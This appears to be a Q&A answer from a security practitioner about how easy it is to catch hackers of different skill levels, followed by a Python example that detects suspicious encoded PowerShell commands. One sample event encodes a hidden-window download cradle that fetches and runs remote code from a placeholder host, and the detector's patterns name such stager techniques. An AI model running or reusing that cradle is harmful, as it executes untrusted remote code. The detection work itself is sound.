How easy is it to catch hackers?

By Farhan Mazid

Originally Answered: How difficult is it to catch computer hackers?

My job is catching hackers. The better the hacker, the harder it is to catch them.

We automatically catch and repel script-kiddie attacks using known, simple tools. Any commercial off-the-shelf solution will do it, and any half-competent security engineer could write one himself in an afternoon, given access to suitable data.

Lower-skill attackers trip the alarms we set to look for the kinds of things that attackers do and users don't. Users in the sales department generally don't execute base64-encoded PowerShell against production servers. It takes a good team to set up the right alarms that catch a real attack but don't trigger too often when no attack happened. Catching this level of attacker is very feasible, but not cheap. These attackers tend to be commercially motivated, looking to steal credit cards, passwords and other monetizable data.

The most skilled nation-state attackers (i.e. intelligence agencies) know what kinds of alarms we set and specifically avoid them. Often they have external intelligence about their targets that lets them know exactly how to hide their tracks and where to find the data they're trying to steal. They may conduct an initial, disposable penetration just for recon and then a second one to achieve their goals. They may use 0-day exploits unknown to anyone else. In the industry, we only catch these attackers if they screw up or we get lucky.

Of course some companies are better at detection than others…
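The kind of alarm the answer describes (encoded PowerShell run by someone who has no business running it, against a host that matters) is straightforward to sketch. The block below is an added example, not code from the answer above or from any product; it scores constructed process-creation events and only pages on the combination of signals, so that a deployment account using -EncodedCommand on the same production box stays below the threshold. The field names (`host`, `user`, `dept`, `cmdline`), the operator departments, the `PRD-` host-naming convention, the scoring weights and the sample events are all assumptions made for the example.

```python
import base64
import binascii
import re
from typing import Optional

# Assumptions for this example: which departments are expected to drive PowerShell,
# and how production hosts are named. In practice these come from your directory/CMDB.
OPERATOR_DEPTS = {"it", "devops", "sre"}
PROD_HOST_PREFIXES = ("PRD-",)

# Things a stager does once the encoded blob runs; keyed by the name reported in the alert.
STAGER_INDICATORS = {
    "in-memory execution": r"\bIEX\b|Invoke-Expression",
    "download cradle": r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b",
    "nested encoding": r"FromBase64String",
}
# Switches that hide the window, skip the profile, or bypass execution policy.
EVASION = re.compile(r"-(nop\w*|noni\w*|(w|win\w*)\s+hid\w*|(ep|ex\w*)\s+bypass)", re.I)


def is_encoded_switch(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return "encodedcommand".startswith(token[1:].lower())


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand payloads are base64 over UTF-16LE; return None if the blob is neither."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> Optional[dict]:
    """Return a finding for a PowerShell launch with an encoded command line, else None."""
    cmdline = event["cmdline"]
    tokens = cmdline.split()  # simplistic: a real parser must honour Windows quoting rules
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1].lower() if tokens else ""
    if exe not in ("powershell.exe", "pwsh.exe", "powershell"):
        return None
    payload = None
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_switch(tok):
            payload = tokens[i + 1].strip("\"'")
            break
    if payload is None:
        return None  # unencoded PowerShell is not, by itself, an alarm

    score, reasons = 1, ["encoded command line"]
    decoded = decode_encoded_command(payload)
    if decoded is None:
        score += 1
        reasons.append("payload is not valid base64/UTF-16LE (obfuscation or broken tooling)")
    else:
        hits = [name for name, pat in STAGER_INDICATORS.items() if re.search(pat, decoded, re.I)]
        if hits:
            score += 2
            reasons.append("stager indicators: " + ", ".join(hits))
    if EVASION.search(cmdline):
        score += 1
        reasons.append("evasion switches on the command line")
    # Context is what separates the sales user from the deployment account.
    if event["dept"].lower() not in OPERATOR_DEPTS:
        score += 2
        reasons.append(f"user in '{event['dept']}' does not normally run PowerShell")
    if event["host"].upper().startswith(PROD_HOST_PREFIXES):
        score += 1
        reasons.append("target is a production host")
    return {"host": event["host"], "user": event["user"], "score": score,
            "reasons": reasons, "decoded": decoded}


def triage(events, threshold: int = 4):
    """Findings at or above the paging threshold, highest score first."""
    findings = [f for f in map(score_event, events) if f and f["score"] >= threshold]
    return sorted(findings, key=lambda f: -f["score"])


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way attackers and admins both do."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1 / 4688 records.
SAMPLE_EVENTS = [
    # Download cradle from a sales user on a production web server: the textbook alarm.
    {"host": "PRD-WEB01", "user": "CORP\\jdoe", "dept": "sales",
     "cmdline": "powershell.exe -NoP -W Hidden -e "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    # Deployment account using -EncodedCommand legitimately on the same host: must not page.
    {"host": "PRD-WEB01", "user": "CORP\\svc-deploy", "dept": "devops",
     "cmdline": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -EncodedCommand "
                + encode_ps("Get-Service W3SVC | Restart-Service")},
    # Plain interactive PowerShell on a workstation: ignored entirely.
    {"host": "WKS-0412", "user": "CORP\\jdoe", "dept": "sales",
     "cmdline": "powershell.exe -Command Get-Date"},
    # Encoded switch whose payload does not decode: still worth a look from this user.
    {"host": "WKS-0412", "user": "CORP\\jdoe", "dept": "sales",
     "cmdline": "powershell.exe -enc Z#Z#notbase64"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['host']} {finding['user']} score={finding['score']}")
        for reason in finding["reasons"]:
            print("  -", reason)
```

The weights are deliberately crude; the point is the shape of the rule. The encoded command line alone scores 1 and never pages, the decoded content and the launch flags add evidence about what the blob does, and the identity and host context decide whether that evidence is anomalous. Tuning the threshold and the operator list against your own telemetry is the expensive part the answer alludes to.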